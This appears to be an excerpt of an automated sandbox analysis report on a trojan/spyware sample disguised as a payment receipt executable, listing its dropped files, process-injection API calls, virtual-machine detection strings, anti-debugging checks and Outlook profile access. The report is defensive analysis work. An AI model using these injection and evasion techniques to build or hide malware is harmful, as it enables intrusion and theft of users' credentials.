Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A99FE0 NtCreateMutant,LdrInitializeThunk, 3_2_00A99FE0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A99710 NtQueryInformationToken,LdrInitializeThunk, 3_2_00A99710
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A998A0 NtWriteVirtualMemory, 3_2_00A998A0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A99820 NtEnumerateKey, 3_2_00A99820
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A9B040 NtSuspendThread, 3_2_00A9B040
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A999D0 NtCreateProcessEx, 3_2_00A999D0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A99950 NtQueueApcThread, 3_2_00A99950
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A99A80 NtOpenDirectoryObject, 3_2_00A99A80
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A99A10 NtQuerySection, 3_2_00A99A10
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A9A3B0 NtGetContextThread, 3_2_00A9A3B0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A99B00 NtSetValueKey, 3_2_00A99B00
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A995F0 NtQueryInformationFile, 3_2_00A995F0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A99520 NtWaitForSingleObject, 3_2_00A99520
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A9AD30 NtSetContextThread, 3_2_00A9AD30
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A99560 NtWriteFile, 3_2_00A99560
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A996D0 NtCreateKey, 3_2_00A996D0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A99610 NtEnumerateValueKey, 3_2_00A99610
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A99670 NtQueryInformationProcess, 3_2_00A99670
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A99650 NtQueryValueKey, 3_2_00A99650
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A99730 NtQueryVirtualMemory, 3_2_00A99730
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A9A710 NtOpenProcessToken, 3_2_00A9A710
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A99760 NtOpenProcess, 3_2_00A99760
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A99770 NtSetInformationFile, 3_2_00A99770
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A9A770 NtOpenThread, 3_2_00A9A770
Source: payment_copy2_receipt.exe ReversingLabs: Detection: 53%
Source: payment_copy2_receipt.exe Virustotal: Detection: 38%
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe File read: C:\Users\user\Desktop\payment_copy2_receipt.exe
Source: payment_copy2_receipt.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\payment_copy2_receipt.exe C:\Users\user\Desktop\payment_copy2_receipt.exe
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe Process created: C:\Users\user\AppData\Local\Temp\fcvvthv.exe "C:\Users\user~1\AppData\Local\Temp\fcvvthv.exe" C:\Users\user~1\AppData\Local\Temp\abggklv.q
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Process created: C:\Users\user\AppData\Local\Temp\fcvvthv.exe "C:\Users\user~1\AppData\Local\Temp\fcvvthv.exe" C:\Users\user~1\AppData\Local\Temp\abggklv.q
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe Process created: C:\Users\user\AppData\Local\Temp\fcvvthv.exe "C:\Users\user~1\AppData\Local\Temp\fcvvthv.exe" C:\Users\user~1\AppData\Local\Temp\abggklv.q
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Process created: C:\Users\user\AppData\Local\Temp\fcvvthv.exe "C:\Users\user~1\AppData\Local\Temp\fcvvthv.exe" C:\Users\user~1\AppData\Local\Temp\abggklv.q
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe File created: C:\Users\user~1\AppData\Local\Temp\nshAD15.tmp
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/5@6/5
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar, 0_2_00402036
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe Code function: 0_2_004043F5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_004043F5
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5180:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Command line argument: ~nA 1_2_00416DD0
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\msdt.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Binary string: msdt.pdbGCTL source: fcvvthv.exe, 00000003.00000002.365908919.0000000002A40000.00000040.10000000.00040000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.355203577.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.353436510.0000000002A4A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: fcvvthv.exe, 00000001.00000003.253544929.0000000002620000.00000004.00001000.00020000.00000000.sdmp, fcvvthv.exe, 00000001.00000003.245524728.0000000002780000.00000004.00001000.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.257319352.0000000000896000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.255559001.00000000005F7000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.360183662.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.362321269.0000000000B4F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.513574094.0000000004C2F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.362154856.000000000497D000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.512407542.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.359598987.00000000047BA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: fcvvthv.exe, fcvvthv.exe, 00000003.00000003.257319352.0000000000896000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.255559001.00000000005F7000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.360183662.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.362321269.0000000000B4F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.513574094.0000000004C2F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.362154856.000000000497D000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.512407542.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.359598987.00000000047BA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: msdt.pdb source: fcvvthv.exe, 00000003.00000002.365908919.0000000002A40000.00000040.10000000.00040000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.355203577.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.353436510.0000000002A4A000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 1_2_0040AB96 push ecx; ret 1_2_0040ABA9
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_004210FC push eax; ret 3_2_0042114F
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00421149 push eax; ret 3_2_0042114F
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00421152 push eax; ret 3_2_004211B9
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_004211B3 push eax; ret 3_2_004211B9
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_0042225A push dword ptr [3115C0DBh]; ret 3_2_0042230D
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_0041B2F0 push esp; ret 3_2_0041B311
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_004054F6 pushad ; retf 007Ah 3_2_004054FA
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00409DDD push ss; retf 3_2_00409DE2
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_004056A2 pushfd ; retf 3_2_004056B1
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00405700 pushfd ; retf 3_2_004056B1
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_0041A721 push eax; retf 3_2_0041A738
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_0041A739 push eax; retf 3_2_0041A738
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00AAD0D1 push ecx; ret 3_2_00AAD0E4
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe File created: C:\Users\user\AppData\Local\Temp\fcvvthv.exe
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msdt.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A86A60 rdtscp 3_2_00A86A60
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe API coverage: 7.2 %
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe API coverage: 8.5 %
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00405620
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe Code function: 0_2_00405FF6 FindFirstFileA,FindClose, 0_2_00405FF6
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe Code function: 0_2_00402654 FindFirstFileA, 0_2_00402654
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 1_2_00410290 FindFirstFileExW, 1_2_00410290
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe API call chain: ExitProcess graph end node
Source: explorer.exe, 00000004.00000000.340277436.0000000007AFF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000000.310477461.0000000007B66000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000008
Source: explorer.exe, 00000004.00000000.335776524.0000000005FE0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.310698898.0000000007BB1000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.305057483.0000000005EF4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.310698898.0000000007BB1000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}E2%d
Source: explorer.exe, 00000004.00000000.335575744.0000000005F12000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 1_2_0040A932 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0040A932
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 1_2_0041265A GetProcessHeap, 1_2_0041265A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A86A60 rdtscp 3_2_00A86A60
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 1_2_0040EC98 mov eax, dword ptr fs:[00000030h] 1_2_0040EC98
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 1_2_0041133B mov eax, dword ptr fs:[00000030h] 1_2_0041133B
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 1_2_00B80019 mov eax, dword ptr fs:[00000030h] 1_2_00B80019
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 1_2_00B80005 mov eax, dword ptr fs:[00000030h] 1_2_00B80005
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 1_2_00B8007A mov eax, dword ptr fs:[00000030h] 1_2_00B8007A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 1_2_00B80149 mov eax, dword ptr fs:[00000030h] 1_2_00B80149
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A990AF mov eax, dword ptr fs:[00000030h] 3_2_00A990AF
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A820A0 mov eax, dword ptr fs:[00000030h] 3_2_00A820A0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A8F0BF mov ecx, dword ptr fs:[00000030h] 3_2_00A8F0BF
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A8F0BF mov eax, dword ptr fs:[00000030h] 3_2_00A8F0BF
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A59080 mov eax, dword ptr fs:[00000030h] 3_2_00A59080
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00AD3884 mov eax, dword ptr fs:[00000030h] 3_2_00AD3884
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A7B8E4 mov eax, dword ptr fs:[00000030h] 3_2_00A7B8E4
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A540E1 mov eax, dword ptr fs:[00000030h] 3_2_00A540E1
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A558EC mov eax, dword ptr fs:[00000030h] 3_2_00A558EC
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00AEB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00AEB8D0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00AEB8D0 mov ecx, dword ptr fs:[00000030h] 3_2_00AEB8D0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00AEB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00AEB8D0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A8002D mov eax, dword ptr fs:[00000030h] 3_2_00A8002D
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A6B02A mov eax, dword ptr fs:[00000030h] 3_2_00A6B02A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A7A830 mov eax, dword ptr fs:[00000030h] 3_2_00A7A830
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B24015 mov eax, dword ptr fs:[00000030h] 3_2_00B24015
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00AD7016 mov eax, dword ptr fs:[00000030h] 3_2_00AD7016
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B12073 mov eax, dword ptr fs:[00000030h] 3_2_00B12073
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B21074 mov eax, dword ptr fs:[00000030h] 3_2_00B21074
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A70050 mov eax, dword ptr fs:[00000030h] 3_2_00A70050
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A861A0 mov eax, dword ptr fs:[00000030h] 3_2_00A861A0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00AD69A6 mov eax, dword ptr fs:[00000030h] 3_2_00AD69A6
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00AD51BE mov eax, dword ptr fs:[00000030h] 3_2_00AD51BE
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B149A4 mov eax, dword ptr fs:[00000030h] 3_2_00B149A4
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A799BF mov ecx, dword ptr fs:[00000030h] 3_2_00A799BF
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A799BF mov eax, dword ptr fs:[00000030h] 3_2_00A799BF
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A7C182 mov eax, dword ptr fs:[00000030h] 3_2_00A7C182
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A8A185 mov eax, dword ptr fs:[00000030h] 3_2_00A8A185
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A82990 mov eax, dword ptr fs:[00000030h] 3_2_00A82990
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A5B1E1 mov eax, dword ptr fs:[00000030h] 3_2_00A5B1E1
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00AE41E8 mov eax, dword ptr fs:[00000030h] 3_2_00AE41E8
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A74120 mov eax, dword ptr fs:[00000030h] 3_2_00A74120
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A74120 mov ecx, dword ptr fs:[00000030h] 3_2_00A74120
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A8513A mov eax, dword ptr fs:[00000030h] 3_2_00A8513A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A59100 mov eax, dword ptr fs:[00000030h] 3_2_00A59100
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A5C962 mov eax, dword ptr fs:[00000030h] 3_2_00A5C962
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A5B171 mov eax, dword ptr fs:[00000030h] 3_2_00A5B171
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A7B944 mov eax, dword ptr fs:[00000030h] 3_2_00A7B944
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A552A5 mov eax, dword ptr fs:[00000030h] 3_2_00A552A5
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A6AAB0 mov eax, dword ptr fs:[00000030h] 3_2_00A6AAB0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A8FAB0 mov eax, dword ptr fs:[00000030h] 3_2_00A8FAB0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A8D294 mov eax, dword ptr fs:[00000030h] 3_2_00A8D294
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A82AE4 mov eax, dword ptr fs:[00000030h] 3_2_00A82AE4
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A82ACB mov eax, dword ptr fs:[00000030h] 3_2_00A82ACB
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A94A2C mov eax, dword ptr fs:[00000030h] 3_2_00A94A2C
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A7A229 mov eax, dword ptr fs:[00000030h] 3_2_00A7A229
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B1AA16 mov eax, dword ptr fs:[00000030h] 3_2_00B1AA16
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A68A0A mov eax, dword ptr fs:[00000030h] 3_2_00A68A0A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A5AA16 mov eax, dword ptr fs:[00000030h] 3_2_00A5AA16
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A55210 mov eax, dword ptr fs:[00000030h] 3_2_00A55210
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A55210 mov ecx, dword ptr fs:[00000030h] 3_2_00A55210
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A55210 mov eax, dword ptr fs:[00000030h] 3_2_00A55210
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A73A1C mov eax, dword ptr fs:[00000030h] 3_2_00A73A1C
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B0B260 mov eax, dword ptr fs:[00000030h] 3_2_00B0B260
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B28A62 mov eax, dword ptr fs:[00000030h] 3_2_00B28A62
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A9927A mov eax, dword ptr fs:[00000030h] 3_2_00A9927A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B1EA55 mov eax, dword ptr fs:[00000030h] 3_2_00B1EA55
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A59240 mov eax, dword ptr fs:[00000030h] 3_2_00A59240
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00AE4257 mov eax, dword ptr fs:[00000030h] 3_2_00AE4257
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A84BAD mov eax, dword ptr fs:[00000030h] 3_2_00A84BAD
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B25BA5 mov eax, dword ptr fs:[00000030h] 3_2_00B25BA5
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A61B8F mov eax, dword ptr fs:[00000030h] 3_2_00A61B8F
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B0D380 mov ecx, dword ptr fs:[00000030h] 3_2_00B0D380
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A8B390 mov eax, dword ptr fs:[00000030h] 3_2_00A8B390
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B1138A mov eax, dword ptr fs:[00000030h] 3_2_00B1138A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A82397 mov eax, dword ptr fs:[00000030h] 3_2_00A82397
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A803E2 mov eax, dword ptr fs:[00000030h] 3_2_00A803E2
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A7DBE9 mov eax, dword ptr fs:[00000030h] 3_2_00A7DBE9
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00AD53CA mov eax, dword ptr fs:[00000030h] 3_2_00AD53CA
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B1131B mov eax, dword ptr fs:[00000030h] 3_2_00B1131B
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A5DB60 mov ecx, dword ptr fs:[00000030h] 3_2_00A5DB60
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A83B7A mov eax, dword ptr fs:[00000030h] 3_2_00A83B7A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A5DB40 mov eax, dword ptr fs:[00000030h] 3_2_00A5DB40
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B28B58 mov eax, dword ptr fs:[00000030h] 3_2_00B28B58
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A5F358 mov eax, dword ptr fs:[00000030h] 3_2_00A5F358
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A6849B mov eax, dword ptr fs:[00000030h] 3_2_00A6849B
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B114FB mov eax, dword ptr fs:[00000030h] 3_2_00B114FB
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00AD6CF0 mov eax, dword ptr fs:[00000030h] 3_2_00AD6CF0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B28CD6 mov eax, dword ptr fs:[00000030h] 3_2_00B28CD6
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A8BC2C mov eax, dword ptr fs:[00000030h] 3_2_00A8BC2C
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00AD6C0A mov eax, dword ptr fs:[00000030h] 3_2_00AD6C0A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h] 3_2_00B11C06
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B2740D mov eax, dword ptr fs:[00000030h] 3_2_00B2740D
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B2740D mov eax, dword ptr fs:[00000030h] 3_2_00B2740D
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B2740D mov eax, dword ptr fs:[00000030h] 3_2_00B2740D
